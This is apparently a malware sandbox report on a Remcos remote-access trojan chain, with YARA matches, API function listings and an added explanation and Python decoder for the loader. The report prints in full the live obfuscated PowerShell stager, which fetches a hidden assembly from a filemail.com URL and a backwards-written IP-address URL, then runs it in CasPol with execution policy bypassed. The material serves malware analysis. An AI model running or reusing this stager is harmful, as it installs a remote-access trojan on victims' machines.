'KCdzSE5pbWFnZVVybCA9IGI0Rmh0dHBzOi8vMTAxJysnNy5maWxlbWFpbC5jb20vYXBpL2ZpbGUvZ2V0P2ZpbGVrZXk9MkFhX2JXbzlSZXU0NXQ3QlUxa1Znc2Q5cFQ5cGdTU2x2U3RHcm5USUNmRmhtVEtqM0xDNlNRdEljT2NfVDM1JysndyZwa192aWQ9ZmQ0ZjYxNGJiMjA5YzYyYzE3MzA5NDUxNycrJzZhMDkwNGYgYjRGO3NITndlYkNsJysnaWVudCA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7cycrJ0hOaW1hZ2VCeXRlcyA9IHNITndlYkNsaWVudC5Eb3dubG8nKydhZERhdGEoc0hOaW1hZ2VVcmwpO3NITmltYWdlVGV4dCA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ10nKyc6OlVURjguR2V0U3RyaW5nKHNITmltJysnYWdlQnl0ZXMpO3NITnN0YXJ0RmxhZyA9IGI0Rjw8QkFTRTY0X1NUQVJUPj5iNEY7c0hOZW5kRmxhZyA9ICcrJ2I0Rjw8QkFTRTY0X0VORD4+YjRGO3NITnN0YXJ0SW5kZXggPSBzSCcrJ05pbWFnZVRlJysneHQuSW5kZXhPZihzSE5zdGFydEZsYWcpO3NITmVuZEluZCcrJ2V4ID0gc0hOaW1hZ2VUZXh0LkluZGV4T2Yoc0hOZW5kRmxhZyk7c0hOc3RhcnRJbmRleCAtZ2UgMCAtYW5kIHNITmVuZEluZGV4IC1ndCBzSE5zdGFydCcrJ0luZGV4O3NITnN0JysnYXJ0SW5kZXggKz0gc0hOc3RhcnRGbGFnJysnLkxlbmd0aDtzSE5iYXNlJysnNjRMZW5ndGggPSBzSE5lbmRJbmRleCAtIHNITnN0YXJ0SW5kZXg7c0hOYmFzZTY0Q29tbWFuZCA9IHNITicrJ2knKydtYWdlVGV4dC5TdWJzdHJpbmcoc0hOc3RhcnRJbmRleCwgc0hOYmFzZTY0TGVuZ3RoKTtzSE5iYXNlNjRSZXZlcnNlZCA9IC1qb2luIChzSE5iYXNlNjRDb21tYW5kLlRvQ2hhckFycmF5KCkgczdnIEZvckVhY2gtT2JqZWN0IHsgc0hOXyB9KVstMS4uLShzSE5iYXNlNjRDb21tYW5kLkxlbmd0aCldO3NITmNvbW1hbmRCeXRlcyA9IFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTJysndHJpbmcoc0hOYmEnKydzZTY0UmV2ZXJzZWQpO3NITmxvYWRlZEFzc2VtYmx5ID0gW1N5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZCcrJyhzSE5jb21tYW5kQnl0ZXMpO3NITnZhaU1ldGhvZCA9IFtkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoYjRGVkFJYjRGKTtzSE52YWlNZXRob2QuSW52bycrJ2tlKHNITm51bGwsIEAoYjRGdHh0LkVEU1NSRi85MjMvODMxLjE3MS40OS4zMi8vOnB0dGhiNEYsIGI0RmRlc2F0aXZhZG9iNEYsIGI0RmRlc2F0aXZhZG9iNCcrJ0YsIGI0RmRlc2F0aXZhZG9iNEYsIGI0RkNhc1BvbCcrJ2I0RiwgYjRGZGVzYXRpdmFkb2I0RiwgYjRGZGVzYXRpdmFkb2InKyc0RixiNEZkZXNhdGl2YWQnKydvYjRGLGI0RmRlc2F0aXZhZG9iNEYsYjRGZGVzYX
RpdmFkb2I0RixiNEZkZXNhdGl2YWRvYjRGLGI0RmRlc2F0aXZhZG9iJysnNEYsYjRGMWI0RixiNEZkZXNhdGl2YWRvYjRGKSk7JykuUkVwbGFDZSgnYjRGJyxbc1RySW5nXVtDSGFyXTM5KS5SRXBsYUNlKCdzSE4nLCckJykuUkVwbGFDZSgnczdnJywnfCcpIHwmICggJFBzaG9tZVs0XSskUFNIT21FWzMwXSsnWCcp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
                    Source: 12.2.CasPol.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Source: 12.2.CasPol.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                    Source: 12.2.CasPol.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                    Source: 12.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Source: 12.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                    Source: 12.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                    Source: 0000000C.00000002.3857869993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Source: 0000000C.00000002.3857869993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Author: unknown
                    Source: 0000000C.00000002.3857869993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                    Source: 0000000A.00000002.1870823401.0000000005C9A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Source: Process Memory Space: powershell.exe PID: 8092, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                    Source: Process Memory Space: powershell.exe PID: 752, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Source: Process Memory Space: powershell.exe PID: 752, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                    Source: Process Memory Space: CasPol.exe PID: 3276, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Source: C:\Windows\SysWOW64\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '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';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCdzSE5pbWFnZVVybCA9IGI0Rmh0dHBzOi8vMTAxJysnNy5maWxlbWFpbC5jb20vYXBpL2ZpbGUvZ2V0P2ZpbGVrZXk9MkFhX2JXbzlSZXU0NXQ3QlUxa1Znc2Q5cFQ5cGdTU2x2U3RHcm5USUNmRmhtVEtqM0xDNlNRdEljT2NfVDM1JysndyZwa192aWQ9ZmQ0ZjYxNGJiMjA5YzYyYzE3MzA5NDUxNycrJzZhMDkwNGYgYjRGO3NITndlYkNsJysnaWVudCA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7cycrJ0hOaW1hZ2VCeXRlcyA9IHNITndlYkNsaWVudC5Eb3dubG8nKydhZERhdGEoc0hOaW1hZ2VVcmwpO3NITmltYWdlVGV4dCA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ10nKyc6OlVURjguR2V0U3RyaW5nKHNITmltJysnYWdlQnl0ZXMpO3NITnN0YXJ0RmxhZyA9IGI0Rjw8QkFTRTY0X1NUQVJUPj5iNEY7c0hOZW5kRmxhZyA9ICcrJ2I0Rjw8QkFTRTY0X0VORD4+YjRGO3NITnN0YXJ0SW5kZXggPSBzSCcrJ05pbWFnZVRlJysneHQuSW5kZXhPZihzSE5zdGFydEZsYWcpO3NITmVuZEluZCcrJ2V4ID0gc0hOaW1hZ2VUZXh0LkluZGV4T2Yoc0hOZW5kRmxhZyk7c0hOc3RhcnRJbmRleCAtZ2UgMCAtYW5kIHNITmVuZEluZGV4IC1ndCBzSE5zdGFydCcrJ0luZGV4O3NITnN0JysnYXJ0SW5kZXggKz0gc0hOc3RhcnRGbGFnJysnLkxlbmd0aDtzSE5iYXNlJysnNjRMZW5ndGggPSBzSE5lbmRJbmRleCAtIHNITnN0YXJ0SW5kZXg7c0hOYmFzZTY0Q29tbWFuZCA9IHNITicrJ2knKydtYWdlVGV4dC5TdWJzdHJpbmcoc0hOc3RhcnRJbmRleCwgc0hOYmFzZTY0TGVuZ3RoKTtzSE5iYXNlNjRSZXZlcnNlZCA9IC1qb2luIChzSE5iYXNlNjRDb21tYW5kLlRvQ2hhckFycmF5KCkgczdnIEZvckVhY2gtT2JqZWN0IHsgc0hOXyB9KVstMS4uLShzSE5iYXNlNjRDb21tYW5kLkxlbmd0aCldO3NITmNvbW1hbmRCeXRlcyA9IFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTJysndHJpbmcoc0hOYmEnKydzZTY0UmV2ZXJzZWQpO3NITmxvYWRlZEFzc2VtYmx5ID0gW1N5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZCcrJyhzSE5jb21tYW5kQnl0ZXMpO3NITnZhaU1ldGhvZCA9IFtkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoYjRGVkFJYjRGKTtzSE52YWlNZXRob2QuSW52bycrJ2tlKHNITm51bGwsIEAoYjRGdHh0LkVEU1NSRi85MjMvODMxLjE3MS40OS4zMi8vOnB0dGhiNEYsIGI0RmRlc2F0aXZhZG9iNEYsIGI0RmRlc2F0aXZhZG9iNCcrJ0YsIGI0RmRlc2F0aXZhZG9iNEYsIGI0RkNhc1BvbCcrJ2I0RiwgYjRGZGVzYXRpdmFkb2I0RiwgYjRGZGVzYXRpdmFkb2InKyc0RixiNEZkZXNhdGl2YWQnKydvYjRGLGI0RmRlc2F0aXZhZG9iNEYsYjRGZGVzYXRpdmFkb2I0RixiNEZkZXNhdGl2YWRvYjRGLGI0RmRlc2F0aXZhZG9iJysnNEYsYjRGMWI0RixiNEZkZXNhdGl2YWRvYjRGKSk7JykuUkVwbGFDZSgnYjRGJyxbc1RySW5nXVtDSGFyXTM5KS5SRXBsYUNlKCdzSE4nLCckJykuUkVwbGFDZSgnczdnJywnfCcpIHwmICggJFBzaG9tZVs0XSskUFNIT21FWzMwXSsnWCcp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxDJump to behavior
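How the wscript-spawned stage above works: $Codigo is base64 for a PowerShell string literal in which the single quote, the dollar sign and the pipe are written as the placeholder tokens b4F, sHN and s7g, and the literal is chopped with '+' at arbitrary points (sometimes inside a token, e.g. b4'+'F). The three .REplaCe() calls restore the real characters after the concatenation, and $Pshome[4]+$PSHOmE[30]+'X' assembles the command name without ever writing it (on the standard C:\Windows\System32\WindowsPowerShell\v1.0 path those indices are i and e, so the expression is ieX). The restored script downloads a file from a filemail.com URL, slices the text between <<BASE64_START>> and <<BASE64_END>>, reverses it, base64-decodes the result into a .NET assembly, and calls [dnlib.IO.Home]::VAI() with a list of arguments whose first element, txt.EDSSRF/923/831.171.49.32//:ptth, is a URL written backwards (http://23.94.171.138/329/FRSSDE.txt) and whose fifth is CasPol, the host process the rest of this report shows the RAT running in. The Python below is an added example written for this report, not code from the page, the sample or Joe Sandbox: it reproduces the decoding steps on a constructed stand-in stage built inline (example.invalid host, a made-up filekey; the real $Codigo value from the command line above can be passed to decode_codigo instead) and mirrors the marker-slice/reverse/decode step the downloader applies to the fetched file.

```python
import base64
import re

# The three placeholder tokens the sample's .REplaCe() calls undo, in the order PowerShell applies them.
TOKEN_MAP = {"b4F": "'", "sHN": "$", "s7g": "|"}
START_MARK, END_MARK = "<<BASE64_START>>", "<<BASE64_END>>"


def decode_codigo(codigo_b64: str) -> str:
    """Undo the $Codigo stage: base64 -> UTF-8 -> extract literal -> join 'a'+'b' splits -> restore tokens."""
    text = base64.b64decode(codigo_b64).decode("utf-8")
    # Outer shape is ('<literal>').REplaCe(...)...; pull out the literal so the .REplaCe() arguments
    # themselves are not rewritten (PowerShell only transforms the inner string at run time).
    m = re.match(r"^\('(.*?)'\)\.replace\(", text, re.S | re.I)
    literal = m.group(1) if m else text
    literal = literal.replace("'+'", "")          # concatenation is evaluated first...
    for token, real in TOKEN_MAP.items():         # ...then the three .Replace() calls
        literal = literal.replace(token, real)
    return literal


def invoke_args(script: str) -> list:
    """Return the argument list handed to [dnlib.IO.Home]::VAI() as plain strings."""
    m = re.search(r"\.Invoke\(\$null,\s*@\((.*?)\)\)", script, re.S)
    if not m:
        return []
    return [a.strip().strip("'") for a in m.group(1).split(",")]


def indicators(script: str) -> dict:
    """Pull the download URL and the VAI() arguments; the first argument is written backwards."""
    url = re.search(r"https?://[^'\s]+", script)
    args = invoke_args(script)
    return {
        "download_url": url.group(0) if url else None,
        "vai_args": args,
        "vai_arg0_reversed": args[0][::-1] if args else None,
    }


def extract_embedded_assembly(downloaded_text: str) -> bytes:
    """Mirror the downloader: slice between the markers, reverse the slice, base64-decode it."""
    start = downloaded_text.index(START_MARK) + len(START_MARK)
    end = downloaded_text.index(END_MARK)
    if end <= start:
        raise ValueError("markers out of order")
    return base64.b64decode(downloaded_text[start:end][::-1])


# --- constructed stand-in data so the example runs offline ---------------------------------
# Shortened stand-in for the decoded stage, written with the sample's token scheme and '+' splits.
# This is NOT the page's real $Codigo value; host and filekey are invented.
_PLAIN = (
    "('sHNimageUrl = b4Fhttps://exa'+'mple.invalid/api/file/get?filekey=TESTb4F;"
    "sHNwebClient = New-Object System.Net.WebClient;"
    "sHNimageText = [System.Text.Encoding]::UTF8.GetString(sHNwebClient.DownloadData(sHNimageUrl));"
    "sHNbase64Reversed = -join (sHNbase64Command.ToCharArray() s7g ForEach-Object { sHN_ })"
    "[-1..-(sHNbase64Command.Length)];"
    "sHNvaiMethod = [dnlib.IO.Home].GetMethod(b4FVAIb4F);"
    "sHNvaiMethod.Invoke(sHNnull, @(b4Ftxt.daolyap/dilavni.elpmaxe//:ptthb4F, b4Fdesativadob4F, "
    "b4FCasPolb4F, b4F1b4F));"
    "').REplaCe('b4F',[sTrIng][CHar]39).REplaCe('sHN','$').REplaCe('s7g','|') |& ( $Pshome[4]+$PSHOmE[30]+'X')"
)
SAMPLE_CODIGO = base64.b64encode(_PLAIN.encode("utf-8")).decode("ascii")

# Constructed stand-in for the fetched file: decoy text, then a (fake) payload hidden reversed between markers.
_FAKE_ASSEMBLY = b"MZ-constructed-stand-in-not-a-real-assembly"
SAMPLE_DOWNLOAD = (
    "<html>decoy text</html>\n"
    + START_MARK
    + base64.b64encode(_FAKE_ASSEMBLY).decode("ascii")[::-1]
    + END_MARK
)

if __name__ == "__main__":
    stage = decode_codigo(SAMPLE_CODIGO)
    print(stage)
    print(indicators(stage))
    print(extract_embedded_assembly(SAMPLE_DOWNLOAD))
```

decode_codigo joins the '+' splits before restoring the tokens because the sample splits inside tokens; doing the replacement first would leave b4'+'F untouched. On the real value the function returns the downloader script with the filemail.com URL in $imageUrl and the VAI() argument list in indicators()["vai_args"]; only the constructed stand-in is asserted on here.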
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_00417245 GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,CreateProcessW,VirtualAlloc,Wow64GetThreadContext,ReadProcessMemory,NtCreateSection,NtUnmapViewOfSection,NtMapViewOfSection,VirtualFree,NtClose,TerminateProcess,GetCurrentProcess,NtMapViewOfSection,WriteProcessMemory,Wow64SetThreadContext,ResumeThread,VirtualFree,GetCurrentProcess,NtUnmapViewOfSection,NtClose,TerminateProcess,GetLastError,12_2_00417245
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_0041ACC1 OpenProcess,NtSuspendProcess,CloseHandle,12_2_0041ACC1
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_0041ACED OpenProcess,NtResumeProcess,CloseHandle,12_2_0041ACED
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_10006FA0 OpenProcess,NtQueryInformationProcess,NtQueryInformationProcess,GetCurrentProcess,DuplicateHandle,GetFinalPathNameByHandleW,CloseHandle,CreateFileMappingW,MapViewOfFile,GetFileSize,UnmapViewOfFile,CloseHandle,CloseHandle,CloseHandle,12_2_10006FA0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 18_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,CloseHandle,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle,18_2_0040DD85
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 18_2_00401806 NtdllDefWindowProc_W,18_2_00401806
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 18_2_004018C0 NtdllDefWindowProc_W,18_2_004018C0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 19_2_004016FD NtdllDefWindowProc_A,19_2_004016FD
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 19_2_004017B7 NtdllDefWindowProc_A,19_2_004017B7
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 24_2_00402CAC NtdllDefWindowProc_A,24_2_00402CAC
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 24_2_00402D66 NtdllDefWindowProc_A,24_2_00402D66
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_004158B9 ExitWindowsEx,LoadLibraryA,GetProcAddress,12_2_004158B9
                    Source: C:\Windows\System32\svchost.exeFile created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_048820BD3_2_048820BD
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_047820BD10_2_047820BD
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_0041D07112_2_0041D071
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_004520D212_2_004520D2
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_0043D09812_2_0043D098
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_0043715012_2_00437150
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_004361AA12_2_004361AA
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_0042625412_2_00426254
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_0043137712_2_00431377
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_0043651C12_2_0043651C
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_0041E5DF12_2_0041E5DF
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_0044C73912_2_0044C739
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_004367C612_2_004367C6
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_004267CB12_2_004267CB
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_0043C9DD12_2_0043C9DD
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_00432A4912_2_00432A49
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_00436A8D12_2_00436A8D
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_0043CC0C12_2_0043CC0C
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_00436D4812_2_00436D48
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_00434D2212_2_00434D22
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_00426E7312_2_00426E73
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_00440E2012_2_00440E20
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_0043CE3B12_2_0043CE3B
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_00412F4512_2_00412F45
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_00452F0012_2_00452F00
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_00426FAD12_2_00426FAD
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_0457B5C112_2_0457B5C1
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_0458719412_2_04587194
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_100012CB12_2_100012CB
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_1003224912_2_10032249
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_1001F57B12_2_1001F57B
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_1001B58412_2_1001B584
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_100137B012_2_100137B0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_1000B97012_2_1000B970
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_10009AB012_2_10009AB0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_10009D2012_2_10009D20
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_1000ED8812_2_1000ED88
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_1000EFB712_2_1000EFB7
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 18_2_0044B04018_2_0044B040
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 18_2_0043610D18_2_0043610D
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 18_2_0044731018_2_00447310
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 18_2_0044A49018_2_0044A490
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 18_2_0040755A18_2_0040755A
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 18_2_0043C56018_2_0043C560
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 18_2_0044B61018_2_0044B610
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 18_2_0044D6C018_2_0044D6C0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 18_2_004476F018_2_004476F0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 18_2_0044B87018_2_0044B870
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 18_2_0044081D18_2_0044081D
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 18_2_0041495718_2_00414957
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 18_2_004079EE18_2_004079EE
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 18_2_00407AEB18_2_00407AEB
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 18_2_0044AA8018_2_0044AA80
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 18_2_00412AA918_2_00412AA9
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 18_2_00404B7418_2_00404B74
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 18_2_00404B0318_2_00404B03
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 18_2_0044BBD818_2_0044BBD8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 18_2_00404BE518_2_00404BE5
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 18_2_00404C7618_2_00404C76
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 18_2_00415CFE18_2_00415CFE
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 18_2_00416D7218_2_00416D72
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 18_2_00446D3018_2_00446D30
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 18_2_00446D8B18_2_00446D8B
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 18_2_00406E8F18_2_00406E8F
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 19_2_0040503819_2_00405038
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 19_2_0041208C19_2_0041208C
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 19_2_004050A919_2_004050A9
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 19_2_0040511A19_2_0040511A
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 19_2_0043C13A19_2_0043C13A
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 19_2_004051AB19_2_004051AB
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 19_2_0044930019_2_00449300
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 19_2_0040D32219_2_0040D322
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 19_2_0044A4F019_2_0044A4F0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 19_2_0043A5AB19_2_0043A5AB
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 19_2_0041363119_2_00413631
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 19_2_0044669019_2_00446690
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 19_2_0044A73019_2_0044A730
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 19_2_004398D819_2_004398D8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 19_2_004498E019_2_004498E0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 19_2_0044A88619_2_0044A886
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 19_2_0043DA0919_2_0043DA09
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 19_2_00438D5E19_2_00438D5E
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 19_2_00449ED019_2_00449ED0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 19_2_0041FE8319_2_0041FE83
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 19_2_00430F5419_2_00430F54
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 24_2_004050C224_2_004050C2
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 24_2_004014AB24_2_004014AB
